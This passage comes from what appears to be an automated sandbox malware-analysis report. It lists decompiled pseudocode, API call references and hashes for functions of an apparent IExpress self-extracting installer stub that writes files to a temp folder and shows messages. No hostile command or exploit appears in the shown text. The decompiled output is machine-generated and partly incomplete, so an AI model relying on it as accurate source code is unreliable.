                                                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000,?,?,?,?), ref: 00A62A81
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3949799724-0
                                                                                                                                                                                                      • Opcode ID: 4e677da04dcd4090d9e6ab1e2ee072a77b246d591a7480983c938e4b95b1b9b7
                                                                                                                                                                                                      • Instruction ID: 64516cd440bc2238226db5026ed021337bbeca62952fbdc99d26a61a4b23a38d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4e677da04dcd4090d9e6ab1e2ee072a77b246d591a7480983c938e4b95b1b9b7
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 74512831E00619EBCB21CFE8C984AAEBBB5FF58740F14402AE905E3261DBB19941DF90
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E00A647E0(intOrPtr* __ecx) {
                                                                                                                                                                                                      				intOrPtr _t6;
                                                                                                                                                                                                      				intOrPtr _t9;
                                                                                                                                                                                                      				void* _t11;
                                                                                                                                                                                                      				void* _t19;
                                                                                                                                                                                                      				intOrPtr* _t22;
                                                                                                                                                                                                      				void _t24;
                                                                                                                                                                                                      				struct HWND__* _t25;
                                                                                                                                                                                                      				struct HWND__* _t26;
                                                                                                                                                                                                      				void* _t27;
                                                                                                                                                                                                      				intOrPtr* _t28;
                                                                                                                                                                                                      				intOrPtr* _t33;
                                                                                                                                                                                                      				void* _t34;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t33 = __ecx;
                                                                                                                                                                                                      				_t34 = LocalAlloc(0x40, 8);
                                                                                                                                                                                                      				if(_t34 != 0) {
                                                                                                                                                                                                      					_t22 = _t33;
                                                                                                                                                                                                      					_t27 = _t22 + 1;
                                                                                                                                                                                                      					do {
                                                                                                                                                                                                      						_t6 =  *_t22;
                                                                                                                                                                                                      						_t22 = _t22 + 1;
                                                                                                                                                                                                      					} while (_t6 != 0);
                                                                                                                                                                                                      					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
                                                                                                                                                                                                      					 *_t34 = _t24;
                                                                                                                                                                                                      					if(_t24 != 0) {
                                                                                                                                                                                                      						_t28 = _t33;
                                                                                                                                                                                                      						_t19 = _t28 + 1;
                                                                                                                                                                                                      						do {
                                                                                                                                                                                                      							_t9 =  *_t28;
                                                                                                                                                                                                      							_t28 = _t28 + 1;
                                                                                                                                                                                                      						} while (_t9 != 0);
                                                                                                                                                                                                      						E00A61680(_t24, _t28 - _t19 + 1, _t33);
                                                                                                                                                                                                      						_t11 =  *0xa691e0; // 0x707b70
                                                                                                                                                                                                      						 *(_t34 + 4) = _t11;
                                                                                                                                                                                                      						 *0xa691e0 = _t34;
                                                                                                                                                                                                      						return 1;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t25 =  *0xa68584; // 0x0
                                                                                                                                                                                                      					E00A644B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
                                                                                                                                                                                                      					LocalFree(_t34);
                                                                                                                                                                                                      					L2:
                                                                                                                                                                                                      					return 0;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t26 =  *0xa68584; // 0x0
                                                                                                                                                                                                      				E00A644B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
                                                                                                                                                                                                      				goto L2;
                                                                                                                                                                                                      			}















                                                                                                                                                                                                      0x00a647e8
                                                                                                                                                                                                      0x00a647f0
                                                                                                                                                                                                      0x00a647f4
                                                                                                                                                                                                      0x00a6480f
                                                                                                                                                                                                      0x00a64811
                                                                                                                                                                                                      0x00a64814
                                                                                                                                                                                                      0x00a64814
                                                                                                                                                                                                      0x00a64816
                                                                                                                                                                                                      0x00a64817
                                                                                                                                                                                                      0x00a64829
                                                                                                                                                                                                      0x00a6482b
                                                                                                                                                                                                      0x00a6482f
                                                                                                                                                                                                      0x00a6484f
                                                                                                                                                                                                      0x00a64852
                                                                                                                                                                                                      0x00a64855
                                                                                                                                                                                                      0x00a64855
                                                                                                                                                                                                      0x00a64857
                                                                                                                                                                                                      0x00a64858
                                                                                                                                                                                                      0x00a64860
                                                                                                                                                                                                      0x00a64865
                                                                                                                                                                                                      0x00a6486a
                                                                                                                                                                                                      0x00a6486f
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a64876
                                                                                                                                                                                                      0x00a64831
                                                                                                                                                                                                      0x00a64841
                                                                                                                                                                                                      0x00a64847
                                                                                                                                                                                                      0x00a6480b
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a6480b
                                                                                                                                                                                                      0x00a647f6
                                                                                                                                                                                                      0x00a64806
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000008,?,00000000,00A64E6F), ref: 00A647EA
                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,?), ref: 00A64823
                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 00A64847
                                                                                                                                                                                                        • Part of subcall function 00A644B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A64518
                                                                                                                                                                                                        • Part of subcall function 00A644B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00A64554
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Local$Alloc$FreeLoadMessageString
                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\$p{p
                                                                                                                                                                                                      • API String ID: 359063898-2520046281
                                                                                                                                                                                                      • Opcode ID: c11ddbb3113cd9637a760e87f588b47c045729b36013692002980499e34281ad
                                                                                                                                                                                                      • Instruction ID: a175aa2534b8efc5fe74f7609bc89468627a4820ac01957f73131c0def399aab
                                                                                                                                                                                                      • Opcode Fuzzy Hash: c11ddbb3113cd9637a760e87f588b47c045729b36013692002980499e34281ad
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 861102B9204641AFD764DF649C18F773B7AEB8A300F148619EA829B241DA768C078760
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 32%
                                                                                                                                                                                                      			E00A64169(void* __eflags) {
                                                                                                                                                                                                      				int _t18;
                                                                                                                                                                                                      				void* _t21;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t20 = E00A6468F("FINISHMSG", 0, 0);
                                                                                                                                                                                                      				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
                                                                                                                                                                                                      				if(_t21 != 0) {
                                                                                                                                                                                                      					if(E00A6468F("FINISHMSG", _t21, _t20) != 0) {
                                                                                                                                                                                                      						if(lstrcmpA(_t21, "<None>") == 0) {
                                                                                                                                                                                                      							L7:
                                                                                                                                                                                                      							return LocalFree(_t21);
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_push(0);
                                                                                                                                                                                                      						_push(0x40);
                                                                                                                                                                                                      						_push(0);
                                                                                                                                                                                                      						_push(_t21);
                                                                                                                                                                                                      						_t18 = 0x3e9;
                                                                                                                                                                                                      						L6:
                                                                                                                                                                                                      						E00A644B9(0, _t18);
                                                                                                                                                                                                      						goto L7;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_push(0);
                                                                                                                                                                                                      					_push(0x10);
                                                                                                                                                                                                      					_push(0);
                                                                                                                                                                                                      					_push(0);
                                                                                                                                                                                                      					_t18 = 0x4b1;
                                                                                                                                                                                                      					goto L6;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E00A644B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                      			}





                                                                                                                                                                                                      0x00a6417d
                                                                                                                                                                                                      0x00a6418f
                                                                                                                                                                                                      0x00a64193
                                                                                                                                                                                                      0x00a641b7
                                                                                                                                                                                                      0x00a641d3
                                                                                                                                                                                                      0x00a641e6
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a641e7
                                                                                                                                                                                                      0x00a641d5
                                                                                                                                                                                                      0x00a641d6
                                                                                                                                                                                                      0x00a641d8
                                                                                                                                                                                                      0x00a641d9
                                                                                                                                                                                                      0x00a641da
                                                                                                                                                                                                      0x00a641df
                                                                                                                                                                                                      0x00a641e1
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a641e1
                                                                                                                                                                                                      0x00a641b9
                                                                                                                                                                                                      0x00a641ba
                                                                                                                                                                                                      0x00a641bc
                                                                                                                                                                                                      0x00a641bd
                                                                                                                                                                                                      0x00a641be
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a641be
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 00A6468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A646A0
                                                                                                                                                                                                        • Part of subcall function 00A6468F: SizeofResource.KERNEL32(00000000,00000000,?,00A62D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A646A9
                                                                                                                                                                                                        • Part of subcall function 00A6468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A646C3
                                                                                                                                                                                                        • Part of subcall function 00A6468F: LoadResource.KERNEL32(00000000,00000000,?,00A62D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A646CC
                                                                                                                                                                                                        • Part of subcall function 00A6468F: LockResource.KERNEL32(00000000,?,00A62D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A646D3
                                                                                                                                                                                                        • Part of subcall function 00A6468F: memcpy_s.MSVCRT ref: 00A646E5
                                                                                                                                                                                                        • Part of subcall function 00A6468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A646EF
                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,00A630B4), ref: 00A64189
                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,00A630B4), ref: 00A641E7
                                                                                                                                                                                                        • Part of subcall function 00A644B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A64518
                                                                                                                                                                                                        • Part of subcall function 00A644B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00A64554
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                      • String ID: <None>$FINISHMSG
                                                                                                                                                                                                      • API String ID: 3507850446-3091758298
                                                                                                                                                                                                      • Opcode ID: 1888a464a41745ce12f00e238494cd4ec7ad67a5cbf30144ef56c6871bee2e2b
                                                                                                                                                                                                      • Instruction ID: 6eda204a7f68eca3c2120916f84dc70d120f79c4d0232a92ee18acd7a64775bb
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1888a464a41745ce12f00e238494cd4ec7ad67a5cbf30144ef56c6871bee2e2b
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9701FFF53002247FF32427A58C8AF7B25BEDBEA795F054225B706E22809EA8CC4241B5
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 93%
                                                                                                                                                                                                      			E00A619E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v520;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t11;
                                                                                                                                                                                                      				void* _t14;
                                                                                                                                                                                                      				void* _t23;
                                                                                                                                                                                                      				void* _t27;
                                                                                                                                                                                                      				void* _t33;
                                                                                                                                                                                                      				struct HWND__* _t34;
                                                                                                                                                                                                      				signed int _t35;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t33 = __edi;
                                                                                                                                                                                                      				_t27 = __ebx;
                                                                                                                                                                                                      				_t11 =  *0xa68004; // 0xfeedc76e
                                                                                                                                                                                                      				_v8 = _t11 ^ _t35;
                                                                                                                                                                                                      				_t34 = _a4;
                                                                                                                                                                                                      				_t14 = _a8 - 0x110;
                                                                                                                                                                                                      				if(_t14 == 0) {
                                                                                                                                                                                                      					_t32 = GetDesktopWindow();
                                                                                                                                                                                                      					E00A643D0(_t34, _t15);
                                                                                                                                                                                                      					_v520 = 0;
                                                                                                                                                                                                      					LoadStringA( *0xa69a3c, _a16,  &_v520, 0x200);
                                                                                                                                                                                                      					SetDlgItemTextA(_t34, 0x83f,  &_v520);
                                                                                                                                                                                                      					MessageBeep(0xffffffff);
                                                                                                                                                                                                      					goto L6;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					if(_t14 != 1) {
                                                                                                                                                                                                      						L4:
                                                                                                                                                                                                      						_t23 = 0;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						_t32 = _a12;
                                                                                                                                                                                                      						if(_t32 - 0x83d > 1) {
                                                                                                                                                                                                      							goto L4;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							EndDialog(_t34, _t32);
                                                                                                                                                                                                      							L6:
                                                                                                                                                                                                      							_t23 = 1;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E00A66CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                                                                                                                                                                      			}













                                                                                                                                                                                                      0x00a619e0
                                                                                                                                                                                                      0x00a619e0
                                                                                                                                                                                                      0x00a619eb
                                                                                                                                                                                                      0x00a619f2
                                                                                                                                                                                                      0x00a619f9
                                                                                                                                                                                                      0x00a619fc
                                                                                                                                                                                                      0x00a61a01
                                                                                                                                                                                                      0x00a61a2a
                                                                                                                                                                                                      0x00a61a2e
                                                                                                                                                                                                      0x00a61a3e
                                                                                                                                                                                                      0x00a61a4f
                                                                                                                                                                                                      0x00a61a62
                                                                                                                                                                                                      0x00a61a6a
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a61a03
                                                                                                                                                                                                      0x00a61a06
                                                                                                                                                                                                      0x00a61a20
                                                                                                                                                                                                      0x00a61a20
                                                                                                                                                                                                      0x00a61a08
                                                                                                                                                                                                      0x00a61a08
                                                                                                                                                                                                      0x00a61a14
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a61a16
                                                                                                                                                                                                      0x00a61a18
                                                                                                                                                                                                      0x00a61a70
                                                                                                                                                                                                      0x00a61a72
                                                                                                                                                                                                      0x00a61a72
                                                                                                                                                                                                      0x00a61a14
                                                                                                                                                                                                      0x00a61a06
                                                                                                                                                                                                      0x00a61a81

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • EndDialog.USER32(?,?), ref: 00A61A18
                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 00A61A24
                                                                                                                                                                                                      • LoadStringA.USER32(?,?,00000200), ref: 00A61A4F
                                                                                                                                                                                                      • SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 00A61A62
                                                                                                                                                                                                      • MessageBeep.USER32(000000FF), ref: 00A61A6A
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1273765764-0
                                                                                                                                                                                                      • Opcode ID: 581a8199f462b0053c4f166a1516a892de38e53c02bf5a5d5c0a3e05b5678279
                                                                                                                                                                                                      • Instruction ID: 84164cb95833f8903d6a0b36d7bcb80b72844f492ce02975bb2ab42571ec3c6e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 581a8199f462b0053c4f166a1516a892de38e53c02bf5a5d5c0a3e05b5678279
                                                                                                                                                                                                      • Instruction Fuzzy Hash: C911A131501119AFDB10EFA4DE08AAE7BB8FF6A340F148254F912E6190DE74AE02CB95
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E00A67155() {
                                                                                                                                                                                                      				void* _v8;
                                                                                                                                                                                                      				struct _FILETIME _v16;
                                                                                                                                                                                                      				signed int _v20;
                                                                                                                                                                                                      				union _LARGE_INTEGER _v24;
                                                                                                                                                                                                      				signed int _t23;
                                                                                                                                                                                                      				signed int _t36;
                                                                                                                                                                                                      				signed int _t37;
                                                                                                                                                                                                      				signed int _t39;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
                                                                                                                                                                                                      				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
                                                                                                                                                                                                      				_t23 =  *0xa68004; // 0xfeedc76e
                                                                                                                                                                                                      				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
                                                                                                                                                                                                      					GetSystemTimeAsFileTime( &_v16);
                                                                                                                                                                                                      					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
                                                                                                                                                                                                      					_v8 = _v8 ^ GetCurrentProcessId();
                                                                                                                                                                                                      					_v8 = _v8 ^ GetCurrentThreadId();
                                                                                                                                                                                                      					_v8 = GetTickCount() ^ _v8 ^  &_v8;
                                                                                                                                                                                                      					QueryPerformanceCounter( &_v24);
                                                                                                                                                                                                      					_t36 = _v20 ^ _v24.LowPart ^ _v8;
                                                                                                                                                                                                      					_t39 = _t36;
                                                                                                                                                                                                      					if(_t36 == 0xbb40e64e || ( *0xa68004 & 0xffff0000) == 0) {
                                                                                                                                                                                                      						_t36 = 0xbb40e64f;
                                                                                                                                                                                                      						_t39 = 0xbb40e64f;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					 *0xa68004 = _t39;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t37 =  !_t36;
                                                                                                                                                                                                      				 *0xa68008 = _t37;
                                                                                                                                                                                                      				return _t37;
                                                                                                                                                                                                      			}











                                                                                                                                                                                                      0x00a6715d
                                                                                                                                                                                                      0x00a67161
                                                                                                                                                                                                      0x00a67165
                                                                                                                                                                                                      0x00a67178
                                                                                                                                                                                                      0x00a67182
                                                                                                                                                                                                      0x00a6718e
                                                                                                                                                                                                      0x00a67197
                                                                                                                                                                                                      0x00a671a0
                                                                                                                                                                                                      0x00a671b1
                                                                                                                                                                                                      0x00a671b8
                                                                                                                                                                                                      0x00a671c4
                                                                                                                                                                                                      0x00a671c7
                                                                                                                                                                                                      0x00a671cb
                                                                                                                                                                                                      0x00a671d5
                                                                                                                                                                                                      0x00a671da
                                                                                                                                                                                                      0x00a671da
                                                                                                                                                                                                      0x00a671dc
                                                                                                                                                                                                      0x00a671dc
                                                                                                                                                                                                      0x00a671e2
                                                                                                                                                                                                      0x00a671e5
                                                                                                                                                                                                      0x00a671ee

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00A67182
                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 00A67191
                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00A6719A
                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00A671A3
                                                                                                                                                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 00A671B8
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1445889803-0
                                                                                                                                                                                                      • Opcode ID: 1ad7424392a75912f1d21d9baba6ec76f51b4e2dcf35e0542188de7b29dd7777
                                                                                                                                                                                                      • Instruction ID: 55b855e4270e48f926aba1f1d19e3972842110de4e2239a7d4ff089fc084c298
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1ad7424392a75912f1d21d9baba6ec76f51b4e2dcf35e0542188de7b29dd7777
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3F114C71D11208EFCB10DFF8DA48A9EB7F8EF19314F614A56D806E7210EA749A058F41
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 88%
                                                                                                                                                                                                      			E00A663C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				long _v272;
                                                                                                                                                                                                      				void* _v276;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t15;
                                                                                                                                                                                                      				long _t28;
                                                                                                                                                                                                      				struct _OVERLAPPED* _t37;
                                                                                                                                                                                                      				void* _t39;
                                                                                                                                                                                                      				signed int _t40;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t15 =  *0xa68004; // 0xfeedc76e
                                                                                                                                                                                                      				_v8 = _t15 ^ _t40;
                                                                                                                                                                                                      				_v272 = _v272 & 0x00000000;
                                                                                                                                                                                                      				_push(__ecx);
                                                                                                                                                                                                      				_v276 = _a16;
                                                                                                                                                                                                      				_t37 = 1;
                                                                                                                                                                                                      				E00A61781( &_v268, 0x104, __ecx, "C:\Users\alfons\AppData\Local\Temp\IXP003.TMP\");
                                                                                                                                                                                                      				E00A6658A( &_v268, 0x104, _a12);
                                                                                                                                                                                                      				_t28 = 0;
                                                                                                                                                                                                      				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
                                                                                                                                                                                                      				if(_t39 != 0xffffffff) {
                                                                                                                                                                                                      					_t28 = _a4;
                                                                                                                                                                                                      					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
                                                                                                                                                                                                      						 *0xa69124 = 0x80070052;
                                                                                                                                                                                                      						_t37 = 0;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					CloseHandle(_t39);
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					 *0xa69124 = 0x80070052;
                                                                                                                                                                                                      					_t37 = 0;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E00A66CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
                                                                                                                                                                                                      			}















                                                                                                                                                                                                      0x00a663cb
                                                                                                                                                                                                      0x00a663d2
                                                                                                                                                                                                      0x00a663d8
                                                                                                                                                                                                      0x00a663ea
                                                                                                                                                                                                      0x00a663f3
                                                                                                                                                                                                      0x00a66401
                                                                                                                                                                                                      0x00a66402
                                                                                                                                                                                                      0x00a66410
                                                                                                                                                                                                      0x00a66415
                                                                                                                                                                                                      0x00a66433
                                                                                                                                                                                                      0x00a66438
                                                                                                                                                                                                      0x00a66449
                                                                                                                                                                                                      0x00a66463
                                                                                                                                                                                                      0x00a6646d
                                                                                                                                                                                                      0x00a66477
                                                                                                                                                                                                      0x00a66477
                                                                                                                                                                                                      0x00a6647a
                                                                                                                                                                                                      0x00a6643a
                                                                                                                                                                                                      0x00a6643a
                                                                                                                                                                                                      0x00a66444
                                                                                                                                                                                                      0x00a66444
                                                                                                                                                                                                      0x00a66492

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\), ref: 00A6642D
                                                                                                                                                                                                      • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\), ref: 00A6645B
                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\), ref: 00A6647A
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\IXP003.TMP\, xrefs: 00A663EB
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: File$CloseCreateHandleWrite
                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\
                                                                                                                                                                                                      • API String ID: 1065093856-3249786385
                                                                                                                                                                                                      • Opcode ID: 881693874657ae10f59829bcb414264af6cd56285d57ffea26db584662d0fe76
